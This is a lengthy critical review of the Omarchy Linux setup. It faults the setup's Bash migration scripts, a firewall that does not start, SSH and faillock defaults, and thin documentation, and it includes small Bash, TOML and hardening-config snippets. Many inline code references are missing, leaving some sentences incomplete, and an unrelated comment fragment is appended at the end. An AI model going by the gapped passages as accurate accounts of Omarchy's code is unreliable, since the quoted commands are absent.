First, some instructions (constants, here) have no effects. There’s some utility in the call but I didn’t understand fully. Then there are some instructions that conditionally have effects depending on the use types of their operands. 1 Taking the absolute value of an Int32 or a Double is effect-free but otherwise looks like it can run arbitrary code. Some run-time IR guards that might cause side exits are annotated as such—they write to the heap. Local variable instructions read specific heaps indexed by what looks like the local index but I’m not sure. This means accessing two different locals won’t alias! Instructions that allocate can’t be re-ordered, it looks like; they both read and write the . This probably limits the amount of allocation sinking that can be done. Then there’s , which is the builtins stuff I was talking about. We’ll come back to that after the code block. (Remember that these operations are very similar to DOMJIT’s with a couple more details—and in some cases even contain DOMJIT s!) This node is the way for the DOM APIs in the browser—a significant chunk of the builtins, which are written in C++—to communicate what they do to the optimizing compiler. Without any annotations, the JIT has to assume that a call into C++ could do anything to the JIT state. Bummer! But because, for example, annotates what memory it reads from and what it doesn’t write to, the JIT can optimize around it better—or even remove the access completely. It means the JIT can reason about calls to known builtins the same way that it reasons about normal JIT opcodes. (Incidentally it looks like it doesn’t even make a C call, but instead is inlined as a little memory read snippet using a JIT builder API. Neat.) Last, we’ll look at Simple, which has a slightly different take on all of this. Simple is Cliff Click’s pet Sea of Nodes (SoN) project to try and showcase the idea to the world—outside of a HotSpot C2 context. 
This one is a little harder for me to understand but it looks like each translation unit has a that doles out different classes of memory nodes for each alias class. Each IR node then takes data dependencies on whatever effect nodes it might use. Alias classes are split up based on the paper Type-Based Alias Analysis (PDF): “Our approach is a form of TBAA similar to the ‘FieldTypeDecl’ algorithm described in the paper.” The Simple project is structured into sequential implementation stages and alias classes come into the picture in Chapter 10 . Because I spent a while spelunking through other implementations to see how other projects did this, here is a list of the projects I looked at. Mostly, they use bitsets. HHVM , a JIT for the Hack language, also uses a bitset for its memory effects. See for example: alias-class.h and memory-effects.h . HHVM has a couple places that use this information, such as a definition-sinking pass , alias analysis , DCE , store elimination , refcount opts , and more. If you are wondering why the HHVM representation looks similar to the Cinder representation, it’s because some former HHVM engineers such as Brett Simmers also worked on Cinder! (note that I am linking an ART fork on GitHub as a reference, but the upstream code is hosted on googlesource ) Android’s ART Java runtime also uses a bitset for its effect representation. It’s a very compact class called in nodes.h . The side effects are used in loop-invariant code motion , global value numbering , write barrier elimination , scheduling , and more. CoreCLR mostly uses a bitset for its class. This one is interesting though because it also splits out effects specifically to include sets of local variables ( ). V8 is also about six completely different compilers in a trenchcoat. Turboshaft uses a struct in operations.h called which is two bitsets for reads/writes of effects. This is used in value numbering as well a bunch of other small optimization passes they call “reducers”.
Maglev also has this thing called in their IR nodes that also looks like a bitset and is used in their various reducers. It has effect query methods on it such as and . Until recently, V8 also used Sea of Nodes as its IR representation, which also tracks side effects more explicitly in the structure of the IR itself. Guile Scheme looks like it has a custom tagging scheme type thing. Both bitsets and int ranges are perfectly cromulent ways of representing heap effects for your IR. The Sea of Nodes approach is also probably okay since it powers HotSpot C2 and (for a time) V8. Remember to ask the right questions of your IR when doing analysis, for example:

- where might this instruction write? (because CPython is reference counted and incref implies ownership)
- where does this instruction borrow its input from?
- do these two instructions’ write destinations overlap?

Thank you to Fil Pizlo for writing his initial GitHub Gist and sending me on this journey and thank you to Chris Gregory , Brett Simmers, and Ufuk Kayserilioglu for feedback on making some of the explanations more helpful.

This is because the DFG compiler does this interesting thing where they track and guard the input types on use vs having types attached to the input’s own def . It might be a clean way to handle shapes inside the type system while also allowing the type+shape of an object to change over time (which it can do in many dynamic language runtimes). ↩
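As a closing sketch, the DCE shape mentioned in the Cinder section—mark instructions whose effects make them live, then sweep everything else—might look like this in miniature. The IR structures here are invented, not any real compiler's.

```java
import java.util.*;

public class DceSketch {
    // Minimal IR instruction: an id, operand ids, and a "has effects" bit.
    record Instr(int id, List<Integer> operands, boolean hasEffects) {}

    // Keep every instruction with observable effects, plus everything its
    // operands (transitively) depend on; anything else is dead.
    static Set<Integer> liveSet(List<Instr> block) {
        Map<Integer, Instr> byId = new HashMap<>();
        for (Instr i : block) byId.put(i.id(), i);

        Deque<Integer> worklist = new ArrayDeque<>();
        for (Instr i : block) if (i.hasEffects()) worklist.push(i.id());

        Set<Integer> live = new HashSet<>();
        while (!worklist.isEmpty()) {
            int id = worklist.pop();
            if (!live.add(id)) continue;           // already marked live
            for (int op : byId.get(id).operands()) worklist.push(op);
        }
        return live;
    }

    public static void main(String[] args) {
        List<Instr> block = List.of(
            new Instr(0, List.of(), false),   // v0 = const (pure)
            new Instr(1, List.of(), false),   // v1 = const (pure, unused)
            new Instr(2, List.of(0), true));  // store v0  (effectful)
        System.out.println(new TreeSet<>(liveSet(block))); // [0, 2]; v1 is dead
    }
}
```

The precision of the whole pass hinges on that one `hasEffects` bit, which is where the bitset or range representations above come in: the finer-grained the effect information, the fewer instructions are conservatively kept alive.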

0 views
Neil Madden 3 weeks ago

Fluent Visitors: revisiting a classic design pattern

It’s been a while since I’ve written a pure programming post. I was recently implementing a specialist collection class that contained items of a number of different types. I needed to be able to iterate over the collection performing different actions depending on the specific type. There are lots of different ways to do this, depending on the school of programming you prefer. In this article, I’m going to take a look at a classic “Gang of Four” design pattern: The Visitor Pattern . I’ll describe how it works, provide some modern spins on it, and compare it to other ways of implementing the same functionality. Hopefully even the most die-hard anti-OO/patterns reader will come away thinking that there’s something worth knowing here after all. (Design Patterns? In this economy?) The example I’ll use in this post is a simple arithmetic expression language. It’s the kind of boring and not very realistic example you see all the time in textbooks, but the more realistic examples I have to hand have too many weird details, so this’ll do. I’m going to write everything in Java 25. Java because, after Smalltalk, it’s probably the language most associated with design patterns. And Java 25 specifically because it makes this example really nice to write. OK, our expression language just has floating-point numbers, addition, and multiplication. So we start by defining datatypes to represent these: If you’re familiar with a functional programming language, this is effectively the same as a datatype definition like the following: Now we want to define a bunch of different operations over these expressions: evaluation, pretty-printing, maybe type-checking or some other kinds of static analysis. We could just directly expose the Expression sub-classes and let each operation directly traverse the structure using pattern matching. For example, we can add an method directly to the expression class that evaluates the expression: (Incidentally, isn’t this great? 
It’s taken a long time, but I really like how clean this is in modern Java). We can then try out an example: Which gives us: There are some issues with this though. Firstly, there’s no encapsulation. If we want to change the way expressions are represented then we have to change eval() and any other function that’s been defined in this way. Secondly, although it’s straightforward for this small expression language, there can be a lot of duplication in operations over a complex structure dealing with details of traversing that structure. The Visitor Pattern solves both of these issues, as we’ll show now. The basic Visitor Pattern involves creating an interface with callback methods for each type of object you might encounter when traversing a structure. For our example, it looks like the following: A few things to note here: The next part of the pattern is to add an method to the Expression class, which then traverses the data structure invoking the callbacks as appropriate. In the traditional implementation, this method is implemented on each concrete sub-class using a technique known as “double-dispatch”. For example, we could add an implementation of to the Add class that calls . This technique is still sometimes useful, but I find it’s often clearer to just inline all that into the top-level Expression implementation (as a method implementation, because Expression is an interface): What’s going on here? Firstly, the method is parameterised to accept any type of return value. Again, we’ll see why in a moment. It then inspects the specific type of expression of this object and calls the appropriate callback on the visitor. Note that in the Add/Mul cases we also recursively visit the left-hand-side and right-hand-side expressions first, similarly to how we called .eval() on those in the earlier listing. We can then re-implement our expression evaluator in terms of the visitor: OK, that works. But it’s kinda ugly compared to what we had. Can we improve it? 
Yes, we can. The Visitor is really just a set of callback functions, one for each type of object in our data structure. Rather than defining these callbacks as an implementation of the interface, we could instead define them as three separate lambda functions. We can then invoke these instead: We can then use this to reimplement our expression evaluator again: That’s a lot nicer to look at. We can then call it as before, and we can also use the fluent visitor to define operations on the fly, such as printing a nicer string representation: There are some potential drawbacks to this approach, but overall I think it’s really clean and nice. One drawback is that you lose compile-time checking that all the cases have been handled: if you forget to register one of the callbacks you’ll get a runtime NullPointerException instead. There are ways around this, such as using multiple FluentVisitor types that incrementally construct the callbacks, but that’s more work: That ensures that every callback has to be provided before you can call , at the cost of needing many more classes. This is the sort of thing where good IDE support would really help (IntelliJ plugin anyone?). Another easy-to-fix nit is that, if you don’t care about the result, it is easy to forget to call and thus not actually do anything at all. This can be fixed by changing the method to accept a function rather than returning a FluentVisitor: The encapsulation that the Visitor provides allows us to quite radically change the underlying representation, while still preserving the same logical view of the data. For example, here is an alternative implementation that works only on positive integers and stores expressions in a compact reverse Polish notation (RPN). 
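As a rough sketch of what such an RPN-backed expression might look like—using plain callback functions rather than the post's exact visitor interface, and with all names invented:

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.function.BiFunction;
import java.util.function.IntFunction;

// Sketch: an expression stored postfix in an int array. Non-negative
// entries are literals; ADD/MUL sentinels mark operators. visit() replays
// the RPN with a stack, invoking one callback per logical node, so callers
// see the same tree-shaped traversal as before.
public class RpnExpression {
    static final int ADD = -1, MUL = -2;
    private final int[] code;

    public RpnExpression(int... code) { this.code = code; }

    public <T> T visit(IntFunction<T> onNum,
                       BiFunction<T, T, T> onAdd,
                       BiFunction<T, T, T> onMul) {
        Deque<T> stack = new ArrayDeque<>();
        for (int op : code) {
            if (op >= 0) { stack.push(onNum.apply(op)); continue; }
            T rhs = stack.pop(), lhs = stack.pop();
            stack.push(op == ADD ? onAdd.apply(lhs, rhs) : onMul.apply(lhs, rhs));
        }
        return stack.pop();
    }

    public static void main(String[] args) {
        // (1 + 2) * 3 in postfix: 1 2 + 3 *
        var e = new RpnExpression(1, 2, ADD, 3, MUL);
        System.out.println(e.visit(n -> n, Integer::sum, (a, b) -> a * b)); // 9
    }
}
```

The point of the sketch is that callers never learn whether the expression is a tree of objects or a flat int array: the callbacks present the same logical view either way.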
The exact same visitors we defined for the previous expression evaluator will also work for this one: Hopefully this article has shown you that there is still something interesting about old patterns like the Visitor, especially if you adapt them a bit to modern programming idioms. I often hear fans of functional programming stating that the Visitor pattern only exists to make up for the lack of pattern matching in OO languages like Java. In my opinion, this is the wrong way to think about things. Even when you have pattern matching (as Java now does) the Visitor pattern is still useful due to the increased encapsulation it provides, hiding details of the underlying representation. The correct way to think about the Visitor pattern is as a natural generalisation of the reduce/fold operation common in functional programming languages. Consider the following (imperative) implementation of a left-fold operation over a list: We can think of a linked list as a data structure with two constructors: Nil (the empty list), and Cons(element, List) (an element followed by the rest of the list). In this case, the reduce operation is essentially a Visitor pattern where corresponds to the case and corresponds to the case. So, far from being a poor man’s pattern matching, the true essence of the Visitor is a generalised fold operation, which is why it’s so useful. Maybe this old dog still has some nice tricks, eh?

Notes:

- We use a generic type parameter <T> to allow operations to return different types of results depending on what they do. We’ll see how this works in a bit.
- In keeping with the idea of encapsulating details, we use the more abstract type rather than the concrete type we’re using under the hood. (We could also have done this before, but I’m doing it here to illustrate that the Visitor interface doesn’t have to exactly represent the underlying data structures).
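For reference, the sealed-interface datatype and a pattern-matching visit method along the lines described in this post can be sketched end-to-end like this. It is a reconstruction from the prose, not the author's exact listings.

```java
import java.util.function.BiFunction;
import java.util.function.DoubleFunction;

public class Expressions {
    // The expression datatype: a sealed interface with one record per case.
    sealed interface Expression permits Num, Add, Mul {
        // visit() traverses the tree, calling one callback per node type.
        default <T> T visit(DoubleFunction<T> onNum,
                            BiFunction<T, T, T> onAdd,
                            BiFunction<T, T, T> onMul) {
            return switch (this) {
                case Num(double value) -> onNum.apply(value);
                case Add(Expression l, Expression r) ->
                    onAdd.apply(l.visit(onNum, onAdd, onMul),
                                r.visit(onNum, onAdd, onMul));
                case Mul(Expression l, Expression r) ->
                    onMul.apply(l.visit(onNum, onAdd, onMul),
                                r.visit(onNum, onAdd, onMul));
            };
        }
    }
    record Num(double value) implements Expression {}
    record Add(Expression lhs, Expression rhs) implements Expression {}
    record Mul(Expression lhs, Expression rhs) implements Expression {}

    public static void main(String[] args) {
        // (1 + 2) * 3
        Expression e = new Mul(new Add(new Num(1), new Num(2)), new Num(3));
        double result = e.visit(v -> v, Double::sum, (a, b) -> a * b);
        String printed = e.visit(v -> Double.toString(v),
                                 (a, b) -> "(" + a + " + " + b + ")",
                                 (a, b) -> "(" + a + " * " + b + ")");
        System.out.println(result);  // 9.0
        System.out.println(printed); // ((1.0 + 2.0) * 3.0)
    }
}
```

Each call to `visit` is a fold over the tree: the three callbacks play the same role as the accumulator function in `reduce`, one per constructor, which is exactly the generalisation the article argues for.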

Pat Shaughnessy 3 weeks ago

Compiling a Call to a Block

I've started working on a new edition of Ruby Under a Microscope that covers Ruby 3.x. I'm working on this in my spare time, so it will take a while. Leave a comment or drop me a line and I'll email you when it's finished. This week's excerpt is from Chapter 2, about Ruby's compiler. Whenever I think about it, I'm always surprised that Ruby has a compiler like C, Java, or any other programming language. The only difference is that we don't normally interact with Ruby's compiler directly. The developers who contributed Ruby's new parser, Prism, also had to rewrite the Ruby compiler because Prism now produces a completely different, redesigned abstract syntax tree (AST). Chapter 2's outline is more or less the same as it was in 2014, but I redrew all of the diagrams and updated much of the text to match the new AST nodes and other changes for Prism. Next, let’s compile my 10.times do example from Listing 1-1 in Chapter 1 (see Listing 2-2). Notice that this example contains a block parameter to the times method. This is interesting because it will give us a chance to see how the Ruby compiler handles blocks. Figure 2-13 shows the AST for the 10.times do example again. The left side of Figure 2-13 shows the AST for the 10.times function call: the call node and the receiver 10, represented by integer node. On the right, Figure 2-13 shows the beginning of the AST for the block: do |n| puts n end , represented by the block node. You can see Ruby has added a scope node on both sides, since there are two lexical scopes in Listing 2-2: the top level and the block. Let’s break down how Ruby compiles the main portion of the script shown on the left of Figure 2-13. As before, Ruby starts with the first PM_NODE_SCOPE and creates a new snippet of YARV instructions, as shown in Figure 2-14. Next, Ruby steps down the AST nodes to PM_CALL_NODE, as shown in Figure 2-15.
At this point, there is still no code generated, but notice in Figure 2-13 that two arrows lead from PM_CALL_NODE : one to PM_INTEGER_NODE , which represents the 10 in the 10.times call, and another to the inner block. Ruby will first continue down the AST to the integer node and compile the 10.times method call. The resulting YARV code, following the same receiver-arguments-message pattern we saw in Figures 2-7 through 2-11, is shown in Figure 2-16. Notice that the new YARV instructions shown in Figure 2-16 push the receiver (the integer object 10) onto the stack first, after which Ruby generates an instruction to execute the times method call. But notice, too, the block in <main> argument in the send instruction. This indicates that the method call also contains a block argument: do |n| puts n end . In this example, the arrow from PM_CALL_NODE to the second PM_SCOPE_NODE has caused the Ruby compiler to include this block argument. Ruby continues by compiling the inner block, beginning with the second PM_CALL_NODE shown at right in Figure 2-13. Figure 2-17 shows what the AST for that inner block looks like. Notice Ruby inserted a scope node at the top of this branch of the AST also. Figure 2-17 shows the scope node contains two values: argc=1 and locals: [n] . These values were empty in the parent scope node, but Ruby set them here to indicate the presence of the block parameter n . From a relatively high level, Figure 2-18 shows how Ruby compiles the inner block. You can see the parent PM_NODE_SCOPE at the top, along with the YARV code from Figure 2-16. And below that Figure 2-18 shows the inner scope node for the block, along with the YARV instructions for the block’s call to puts n . Later in this chapter we’ll learn how Ruby handles parameters and local variables, like n in this example, and why Ruby generates these instructions for puts n .
The key point for now is that Ruby compiles each distinct scope in your Ruby program—methods, blocks, classes, or modules, for example—into a separate snippet of YARV instructions.


Gatekeepers vs. Matchmakers

I estimate I’ve conducted well over 1,000 job interviews for developers and managers in my career. This has caused me to form opinions about what makes a good interview. I’ve spent the majority of it in fast-growing companies and, with the exception of occasional pauses here and there, we were always hiring. I’ve interviewed at every level from intern (marathon sessions at the University of Waterloo campus interviewing dozens of candidates over a couple of days) to VP and CTO level (my future bosses in some cases, my successor in roles I was departing in others). Probably the strongest opinion that I hold after all that is: adopting a Matchmaker approach builds much better teams than falling into Gatekeeper mode. Once the candidate has passed some sort of initial screen, either with a recruiter, the hiring manager, or both, most “primary” interviews are conducted with two to three employees interviewing the candidate—often the hiring manager and an individual contributor. (Of course, there are innumerable ways you can structure this, but that structure is what I’ve seen to be the most common.) Interviewers usually start with one of two postures when interviewing: the Gatekeeper or the Matchmaker : The former, the Gatekeeper , I would say is more common overall and certainly more common among individual contributors and people earlier in their career. It’s also a big driver of why a lot of interview processes include some sort of coding “test” meant to expose the fraudulent scammers pretending to be “real” programmers. All of that dates back to the early 2000s and the post-dotcom crash. Pre-crash, anyone with a pulse who could string together some HTML could get a “software developer” job, so there were a lot of people with limited experience and skills on the job market. Nowadays, aside from outright fraudsters (which are rare) I haven’t observed many wholly unqualified people getting past the résumé review or initial screen. 
If you let Gatekeepers design your interview process, you’ll often get something that I refer to as “programmer Jeopardy! .” The candidate is peppered with what amount to trivia questions: …and so on. For most jobs where you’re building commercial software by gluing frameworks and APIs together, having vague (or even no) knowledge of those concepts is going to be plenty. Most devs can go a long time using Java or C# before getting into some sort of jam where learning intimate details of the garbage collector’s operation gets them out of it. (This wasn’t always true, but things have improved.) Of course, if the job you’re hiring for is some sort of specialist role around your databases, queuing systems, or infrastructure in general, you absolutely should probe for specialist knowledge of those things. But if the job is “full stack web developer,” where they’re mostly going to be writing business logic and user interface code, they may have plenty of experience and be very good at those things without ever having needed to learn about consensus algorithms and the like. Then, of course, there’s the much-discussed “coding challenge,” the worst versions of which involve springing a problem on someone, giving them a generous four or five minutes to read it, then expecting them to code a solution with a countdown timer running and multiple people watching them. Not everyone can put their best foot forward in those conditions, and after you’ve run the same exercise more than a few times with candidates, it’s easy to forget what the “first-look” experience is like for candidates. Maybe I’ll write a full post about it someday, but it’s my firm conviction that these types of tests have a false-negative rate so high that they’re counterproductive. 
Gatekeeper types often over-rotate on the fear of “fake” programmers getting hired and use these trivia-type questions and high-pressure exercises to disqualify people who would be perfectly capable of doing the job you need them to do and perfectly capable of learning any of that other stuff quickly, on an as-needed basis. If your interview process feels a bit like an elimination game show, you can probably do better. You, as a manager, are judged both on the quality of your hires and your ability to fill open roles. When the business budgets for a role to be filled, they do so because they expect a business outcome from hiring that person. Individual contributors are not generally rewarded or punished for hiring decisions, so their incentive is to avoid bringing in people who make extra work for them. Hiring an underskilled person onto the team is a good way to drag down productivity rather than improve it, as everyone has to spend some of their time carrying that person. Additionally, the absence of any kind of licensing or credentialing structure✳️ in programming creates a vacuum that the elimination game show tries to fill. In medicine, law, aviation, or the trades, there’s an external gatekeeper that ensures a baseline level of competence before anyone can even apply for a job. In software, there’s no equivalent, so it makes sense that some interviewers take a “prove to me you can do this job” approach out of the gate. But there’s a better way. “Matchmaking” in the romantic sense tries to pair up people with mutual compatibilities in the hopes that their relationship will also be mutually beneficial to both parties—a real “whole is greater than the sum of its parts” scenario. This should also be true of hiring. You have a need for some skills that will elevate and augment your team; candidates have a desire to do work that means something to them with people they like being around (and yes, money to pay the bills, of course). 
When people date each other, they’re usually not looking to reject someone based on a box-checking exercise. Obviously, some don’t make it past the initial screen for various reasons, but if you’re going on a second date and looking for love, you’re probably doing it because you want it to work out. Same goes for hiring. If you take the optimistic route, you can let go of some of the pass/fail and one-size-fits-all approaches to candidate evaluation and spend more time trying to find a love match. For all but the most junior roles, I’m confident you can get a strong handle on a candidate’s technical skills by exploring their work history in depth. I’m a big fan of “behavioural” interviewing, where you ask about specific things the candidate has done. I start with a broad opening question and then use ad hoc follow-ups in as conversational a manner as I can muster. I want to have a discussion, not an interrogation. Start with questions like:

- What’s the work you’ve done that you’re the most proud of?✳️
- What’s the hardest technical problem you’ve encountered? What was the resolution?
- Tell me about your favourite team member to work with. Least favourite?

If you practice, or watch someone who is good at this type of interview, you can easily fill a 45–60 minute interview slot with a couple of those top-level questions and some ad hoc follow-ups based on their answers. Of the three examples I gave, two are a good starting place for assessing technical skills. Most developers will give you a software project as the work they’re the most proud of (if they say “I raised hamsters as a kid,” feel free to ask them to limit it to the realm of software development and try again). This is your opportunity to dig in on the technical details:

- What language or frameworks did they use? Did they choose, or did someone else?
- How was it deployed?
- What sort of testing strategy did they use?
- What databases were involved?
- How did their stuff fit into the architecture of the broader system?

Questions like that will give you a much stronger signal on their technical skills and, importantly, experience. You should be able to easily tell how much the candidate was a driver vs. a passenger on the project, whether or not they thought about the bigger picture, and how deep or shallow their knowledge was. And, of course, you can keep asking follow-up questions to the follow-up questions until you’ve got a good sense.

Interviewing and taking a job does have a lot of parallels to dating and getting married. There are emotional and financial implications for both parties if it doesn’t work out, there’s always a degree of risk involved, and there’s sometimes a degree of asymmetry between the parties. In the job market, the asymmetry is nearly always in favour of the employer. They hold most of the cards and can dictate the terms of the process completely. You have a choice as a leader how much you want to wield that power. My advice is to wield it sparingly—try to give candidates the kind of experience where even if you don’t hire them, they had a good enough time in the process that they’d still recommend you to a friend. Taking an interest in their experience, understanding what motivates them, and fitting candidates to the role that maximizes their existing skills, challenges them in the right ways, and takes maximum advantage of their intrinsic motivations will produce much better results than making them run through the gauntlet like a contestant on Survivor .

The two mindsets, side by side:

- I don’t want to hire this person unless they prove themselves worthy . It’s my job to keep the bad and fake programmers out. ( Gatekeeper )
- I want to hire this person unless they disqualify themselves somehow. It’s my job to find a good match between our needs and the candidate’s skills and interests. ( Matchmaker )

And the kind of trivia the gatekeepers lean on:

- What’s a deadlock? How do you resolve it?
- Oh, you know Java? Explain how the garbage collector works!
- What’s the CAP theorem?

" Old Royal Naval College, Greenwich - King William Court and Queen Mary Court - gate " by ell brown is licensed under CC BY 2.0 .

マリウス 1 month ago

A Word on Omarchy

Pro tip: If you’ve arrived here via a link aggregator, feel free to skip ahead to the Summary for a conveniently digestible tl;dr that spares you all the tedious details, yet still provides enough ammunition to trash-talk this post in the comments of whatever platform you stumbled upon it. In recent months, there has been a noticeable shift away from the Windows desktop, as well as from macOS , to Linux, driven by various frustrations, such as the Windows 11 Recall feature. While there have historically been more than enough Linux distributions to choose from, for each skill level and amount of desired pain, a recent Arch -based configuration has seemingly made strides across the Linux landscape: Omarchy . This pre-configured Arch system is the brainchild of David Heinemeier Hansson , a Danish web developer and entrepreneur known as one of the co-founders of 37signals and for developing the Ruby on Rails framework. The name Omarchy appears to be a portmanteau of Arch , the Linux distribution that Hansson ’s configuration is based upon, and お任せ, which transliterates to omakase and means to leave something up to someone else (任せる, makaseru, to entrust ). When ordering omakase in a restaurant, you’re leaving it up to the chef to serve you whatever they think is best. Oma(kase) + (A)rch + y is supposedly where the name comes from. It’s important to note that, contrary to what Hansson says in the introduction video , Omarchy is not an actual Linux distribution . Instead, it’s an opinionated installation of Arch Linux that aims to make it easy to set up and run an Arch desktop, seemingly with as much TUI-hacker-esque aesthetic as possible. Omarchy comes bundled with Hyprland , a tiling window manager that focuses on customizability and graphic effects, but apparently not as much on code quality and safety . However, the sudden hype around Omarchy , which at this point has attracted attention and seemingly even funding from companies like Framework (Computer Inc.)
( attention ) and Cloudflare ( attention and seemingly funding ), made me want to take a closer look at the supposed cool kid on the block to understand what it was all about. Omarchy is a pre-configured installation of the Arch distribution that comes with a TUI installer on a 6.2GB ISO. It ships with a collection of shell scripts that use existing FOSS software (e.g. walker ) to implement individual features. The project is based on the work that the FOSS community, especially the Arch Linux maintainers, have done over the years, and ties together individual components to offer a supposed ready-to-use desktop experience. Omarchy also adds some links to different websites, disguised as “Apps” , but more on that later. This, however, seems to be enough to spark an avalanche of attention and, more importantly, financial support for the project. Anyway, let’s give Omarchy an actual try, and see what chef Hansson recommended to us. The Omarchy installer is a simple text user interface that tries to replicate what Charm has pioneered with their TUI libraries: A smooth command-line interface that preserves the simplicity of the good old days , yet enhances the experience with playful colors, emojis, and animations for the younger, future generation of users. Unlike mature installers, Omarchy ’s installer script doesn’t allow for much customization, which is probably to be expected with an “Opinionated Arch/Hyprland Setup” . Info: Omarchy uses gum , a Charm tool, under the hood. One of the first things that struck me as unexpected was the fact that I was able to use as my user password, an easy-to-guess word that Omarchy will also use for the drive encryption, without any resistance from the installer. Most modern Linux distributions actively prevent users from setting easily guessable or brute-forceable passwords. 
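For reference, the mechanism most distributions use for those password checks is PAM’s pwquality module. A hypothetical one-line sketch of such a policy (the values are invented for illustration, not taken from any particular distribution):

```
# Hypothetical /etc/pam.d/passwd excerpt -- pam_pwquality rejects trivial
# passwords before they ever reach the password database:
password required pam_pwquality.so retry=3 minlen=12 dcredit=-1 ucredit=-1
```

An installer that feeds the chosen password through a check like this (or through cracklib) would have refused a dictionary word outright.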
Moreover, taking into account that the system relies heavily on sudo (instead of the more modern doas ), and also considering that the default installation configures the maximum number of password retries to 10 (instead of the more cautious limit of three), it raises an important question: Does Omarchy care about security? Let’s take a look at the Omarchy manual to find out: Omarchy takes security extremely seriously. This is meant to be an operating system that you can use to do Real Work in the Real World . Where losing a laptop can’t lead to a security emergency. According to the manual, taking security extremely seriously means enabling full-disk encryption (but without rejecting simple keys), blocking all ports except for 22 (SSH, on a desktop) and 53317 (LocalSend), continuously running (even though staying bleeding-edge has repeatedly proven to be an insufficient security measure in the past) and maintaining a Cloudflare-protected package mirror. That’s seemingly all. Hm. Proceeding with the installation, the TUI prompts for an email address, which makes the whole process feel a bit like the Windows setup routine. While one might assume Omarchy is simply trying to accommodate its new user base, the actual reason appears to be much simpler: . If, however, you were expecting Omarchy to set up GPG with proper defaults, configure SSH with equally secure defaults, and perhaps offer an option to create new GPG/SSH keys or import existing ones, in order to enable proper commit and push signing for Git, you will be left disappointed. Unfortunately, none of this is the case. The Git config doesn’t enable commit or push signing, neither the GPG nor the SSH client configurations set secure defaults, and the user isn’t offered a way to import existing keys or create new ones. Given that Hansson himself usually does not sign his commits, it seems that these aspects are not particularly high on the project’s list of priorities.
The rest of the installer routine is fairly straightforward and offers little customization, so I won’t bore you with the details, but you can check the screenshots below. After initially downloading the official ISO file, the first boot of the system greets you with a terminal window informing you that it needs to update a few packages . And by “a few” it means another 1.8GB. I’m still not entirely sure why the v3.0.2 ISO is a hefty 6.2GB, or why it requires downloading an additional 1.8GB after installation on a system with internet access. For comparison, the official Arch installer image is just 1.4GB in size . While downloading the updates (which took over an hour for me), and with over 15GB of storage consumed on my hard drive, I set out to experience the full Omarchy goodness! After hovering over a few icons on the Waybar , I discovered the menu button on the very left. It’s not a traditional menu, but rather a shortcut to the aforementioned walker launcher tool, which contains a few submenus: The menu reads: Apps, Learn, Trigger, Style, Setup, Install, Remove, Update, About, System; It feels like a random assortment of categories, settings, package manager subcommands, and actions. From a UX perspective, this main menu doesn’t make much sense to me. But I’m feeling lucky, so let’s just go ahead and type “Browser” ! Hm, nothing. “Firefox” , maybe? Nope. “Chrome” ? Nah. “Chromium” ? No. Unfortunately the search in the menu is not universal and requires you to first click into the Apps category. The Apps category seems to list all available GUI (and some TUI) applications. 
Let’s take a look at the default apps that Omarchy comes with: The bundled “apps” are: 1Password, Alacritty, Basecamp, Bluetooth, Calculator, ChatGPT, Chromium, Discord, Disk Usage, Docker, Document Viewer, Electron 37, Figma, Files, GitHub, Google Contacts, Google Messages, Google Photos, HEY, Image Viewer, Kdenlive, LibreOffice, LibreOffice Base, LibreOffice Calc, LibreOffice Draw, LibreOffice Impress, LibreOffice Math, LibreOffice Writer, Limine-snapper-restore, LocalSend, Media Player, Neovim, OBS Studio, Obsidian, OpenJDK Java 25 Console, OpenJDK Java 25 Shell, Pinta, Print Settings, Signal, Spotify, Typora, WhatsApp, X, Xournal++, YouTube, Zoom; Aside from the fact that nearly a third of the apps are essentially just browser windows pointing to websites , which leaves me wondering where the 15GB of used storage went, the selection of apps is also… well, let’s call it opinionated , for now at least. Starting with the browser, Omarchy comes with Chromium by default, specifically version 141.0.7390.107 in my case, which, unlike, for example, ungoogled-chromium , has disabled support for manifest v2 and thus doesn’t include extensions like uBlock Origin or any other advanced add-ons. In fact, the browser is completely vanilla, with no decent configuration. The only extension it includes is the copy-url extension, which serves a rather obscure purpose: Providing a non-intuitive way to copy the current page’s URL to your clipboard using an even less intuitive shortcut ( ) while using any of the “Apps” that are essentially just browser windows without browser controls. Other than that, it’s pretty much stock Chromium. It allows all third-party cookies, doesn’t send “Do Not Track” requests, sends browsing data to Google Safe Browsing , but doesn’t enforce HTTPS. It has JavaScript optimization enabled for all websites, which increases the attack surface, and it uses Google as the default search engine. 
There’s not a single opinionated setting in the configuration of the default browser on Omarchy , let alone in the choice of browser itself. And the fact that the only extension installed and active by default is an obscure workaround for the lack of URL bars in “App” windows doesn’t exactly make this first impression of what is likely one of the most important components for the typical Omarchy user very appealing. Alright, let’s have a look at what is probably the second most important app after the browser for many people in the target audience: Basecamp ! Just kidding. Obviously, it’s the terminal. Omarchy comes with Alacritty by default, which is a bit of an odd choice in 2025, especially for a desktop that seemingly prioritizes form over function, given the ultra-conservative approach the Alacritty developers take toward anything related to form and sometimes even function. I would have rather expected Kitty , WezTerm , or Ghostty . That said, Alacritty works and is fairly configurable. Unfortunately, like the browser and various other tools such as Git, there’s little to no opinionated configuration happening, especially one that would enhance integration with the Omarchy ecosystem. Omarchy seemingly highlights the availability of NeoVim by default, yet doesn’t explicitly configure Alacritty’s vi mode , leaving it at its factory defaults . In fact, aside from the keybinding for full-screen mode, which is a less-than-ideal shortcut for anyone with a keyboard smaller than 100% (unless specifically mapped), the Alacritty config doesn’t define any other shortcuts to integrate the terminal more seamlessly into the supposed opinionated workflow. Not even the desktop’s key-repeat rate is configured to a reasonable value, as it takes about a second for it to kick in. Fun fact: When you leave your computer idling on your desk, the screensaver you’ll encounter isn’t an actual hyprlock that locks your desktop and uses PAM authentication to prevent unauthorized access. 
